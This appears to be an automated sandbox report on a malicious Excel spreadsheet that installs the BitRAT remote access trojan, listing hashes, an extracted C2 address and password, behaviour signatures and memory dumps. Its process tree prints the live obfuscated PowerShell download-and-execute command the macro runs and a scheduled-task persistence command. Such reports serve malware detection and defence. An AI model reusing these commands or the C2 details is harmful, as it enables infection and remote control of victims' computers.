Analysis

  • max time kernel
    47s
  • max time network
    77s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-09-2023 15:11

General

  • Target

    Romania_Request_Imun_SRL_09_2023.xls

  • Size

    100KB

  • MD5

    d8c96466da14e352c8a11c86a61200fa

  • SHA1

    738380f30ec9f2448875dd97759bf49aa292cf46

  • SHA256

    896dd0f8a116edbf4f54be7fac310410467043ecbd86b2d4d66089f14bde6d01

  • SHA512

    d81aafbea2392976e331e00ca0cd5c4054f7aab57a640af8a15c6143846c828c0235f34a94721313dec400a8b0724111ed647865846971d33ccca7a57bf5f70c

  • SSDEEP

    3072:0rxEtjPOtioVjDGUU1qfDlaGGx+cL2QnA9tJE2zuxq+fr9wBLa71ba2ryLTHeY+:axEtjPOtioVjDGUU1qfDlavx+W2QnAnF

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Romania_Request_Imun_SRL_09_2023.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4312
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/qyAOUa1rJz/Betro.e^xe -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4260
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/qyAOUa1rJz/Betro.exe -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2980
        • C:\Users\Public\l6hv4.exe
          "C:\Users\Public\l6hv4.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:4592
          • C:\Users\Public\l6hv4.exe
            "C:\Users\Public\l6hv4.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:3492
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\uno"
            5⤵
              PID:5056
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3548
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f
                6⤵
                • Creates scheduled task(s)
                PID:1088
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c copy "C:\Users\Public\l6hv4.exe" "C:\Users\Admin\AppData\Roaming\uno\uno.exe"
              5⤵
                PID:2420
      • C:\Users\Admin\AppData\Roaming\uno\uno.exe
        C:\Users\Admin\AppData\Roaming\uno\uno.exe
        1⤵
        • Executes dropped EXE
        PID:5024

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hrhivsem.r1d.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\uno\uno.exe
        Filesize

        7.6MB

        MD5

        1c9f3c0258e923c07e1943498c789a3d

        SHA1

        e908faaa5eff19c6b653241253ecc6f28c83f436

        SHA256

        925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55

        SHA512

        92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

      • C:\Users\Admin\AppData\Roaming\uno\uno.exe
        Filesize

        3.2MB

        MD5

        9ed1bca0a7917030a86154e229f2ec95

        SHA1

        978d8211f527d179f573b8425c4cd71eac84bc5d

        SHA256

        2d45251a910f6b65ca6155b439e4b6419d4655a11ff5a3011e7756aead9cd548

        SHA512

        6b11aaf5ab8cc9d58504c25736614fad7c4c4cd72038db7263a72a2dba29dda76a2cf4e286c3a9c25ae44afba8556034ffd1849f70ef86fac197eccff1ef86b9

      • C:\Users\Admin\AppData\Roaming\uno\uno.exe
        MD5

        d41d8cd98f00b204e9800998ecf8427e

        SHA1

        da39a3ee5e6b4b0d3255bfef95601890afd80709

        SHA256

        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

        SHA512

        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

      • C:\Users\Public\l6hv4.exe
        Filesize

        7.6MB

        MD5

        1c9f3c0258e923c07e1943498c789a3d

        SHA1

        e908faaa5eff19c6b653241253ecc6f28c83f436

        SHA256

        925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55

        SHA512

        92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

      • C:\Users\Public\l6hv4.exe
        Filesize

        7.6MB

        MD5

        1c9f3c0258e923c07e1943498c789a3d

        SHA1

        e908faaa5eff19c6b653241253ecc6f28c83f436

        SHA256

        925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55

        SHA512

        92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

      • C:\Users\Public\l6hv4.exe
        Filesize

        7.6MB

        MD5

        1c9f3c0258e923c07e1943498c789a3d

        SHA1

        e908faaa5eff19c6b653241253ecc6f28c83f436

        SHA256

        925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55

        SHA512

        92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

      • memory/2980-51-0x000001AD7ADC0000-0x000001AD7ADD0000-memory.dmp
        Filesize

        64KB

      • memory/2980-47-0x00007FFC083F0000-0x00007FFC08EB1000-memory.dmp
        Filesize

        10.8MB

      • memory/2980-58-0x00007FFC083F0000-0x00007FFC08EB1000-memory.dmp
        Filesize

        10.8MB

      • memory/2980-59-0x000001AD7ADC0000-0x000001AD7ADD0000-memory.dmp
        Filesize

        64KB

      • memory/2980-60-0x000001AD7ADC0000-0x000001AD7ADD0000-memory.dmp
        Filesize

        64KB

      • memory/2980-61-0x000001AD7ADC0000-0x000001AD7ADD0000-memory.dmp
        Filesize

        64KB

      • memory/2980-52-0x000001AD7ADC0000-0x000001AD7ADD0000-memory.dmp
        Filesize

        64KB

      • memory/2980-50-0x000001AD7ADC0000-0x000001AD7ADD0000-memory.dmp
        Filesize

        64KB

      • memory/2980-69-0x00007FFC083F0000-0x00007FFC08EB1000-memory.dmp
        Filesize

        10.8MB

      • memory/2980-37-0x000001AD62740000-0x000001AD62762000-memory.dmp
        Filesize

        136KB

      • memory/3492-90-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3492-76-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3492-81-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3492-79-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3492-78-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3492-85-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3492-86-0x00000000745E0000-0x0000000074619000-memory.dmp
        Filesize

        228KB

      • memory/3492-87-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3492-88-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3492-89-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3492-91-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3492-92-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3492-94-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/3492-95-0x0000000074860000-0x0000000074899000-memory.dmp
        Filesize

        228KB

      • memory/4312-16-0x00007FFBEE850000-0x00007FFBEE860000-memory.dmp
        Filesize

        64KB

      • memory/4312-12-0x00007FFBEE850000-0x00007FFBEE860000-memory.dmp
        Filesize

        64KB

      • memory/4312-49-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-36-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-35-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-33-0x000002095D340000-0x000002095DB40000-memory.dmp
        Filesize

        8.0MB

      • memory/4312-53-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-54-0x000002095D340000-0x000002095DB40000-memory.dmp
        Filesize

        8.0MB

      • memory/4312-55-0x000002095D340000-0x000002095DB40000-memory.dmp
        Filesize

        8.0MB

      • memory/4312-32-0x000002095D340000-0x000002095DB40000-memory.dmp
        Filesize

        8.0MB

      • memory/4312-30-0x000002095D340000-0x000002095DB40000-memory.dmp
        Filesize

        8.0MB

      • memory/4312-23-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-22-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-21-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-20-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-19-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-2-0x00007FFBF0D90000-0x00007FFBF0DA0000-memory.dmp
        Filesize

        64KB

      • memory/4312-1-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-3-0x00007FFBF0D90000-0x00007FFBF0DA0000-memory.dmp
        Filesize

        64KB

      • memory/4312-5-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-4-0x00007FFBF0D90000-0x00007FFBF0DA0000-memory.dmp
        Filesize

        64KB

      • memory/4312-18-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-0-0x00007FFBF0D90000-0x00007FFBF0DA0000-memory.dmp
        Filesize

        64KB

      • memory/4312-17-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-15-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-14-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-6-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-13-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-48-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-11-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-10-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-9-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-8-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
        Filesize

        2.0MB

      • memory/4312-7-0x00007FFBF0D90000-0x00007FFBF0DA0000-memory.dmp
        Filesize

        64KB

      • memory/4592-82-0x00000000746D0000-0x0000000074E80000-memory.dmp
        Filesize

        7.7MB

      • memory/4592-75-0x00000000079A0000-0x000000000812A000-memory.dmp
        Filesize

        7.5MB

      • memory/4592-74-0x0000000005E30000-0x0000000005E40000-memory.dmp
        Filesize

        64KB

      • memory/4592-73-0x00000000063F0000-0x0000000006994000-memory.dmp
        Filesize

        5.6MB

      • memory/4592-72-0x0000000000CA0000-0x000000000143C000-memory.dmp
        Filesize

        7.6MB

      • memory/4592-71-0x00000000746D0000-0x0000000074E80000-memory.dmp
        Filesize

        7.7MB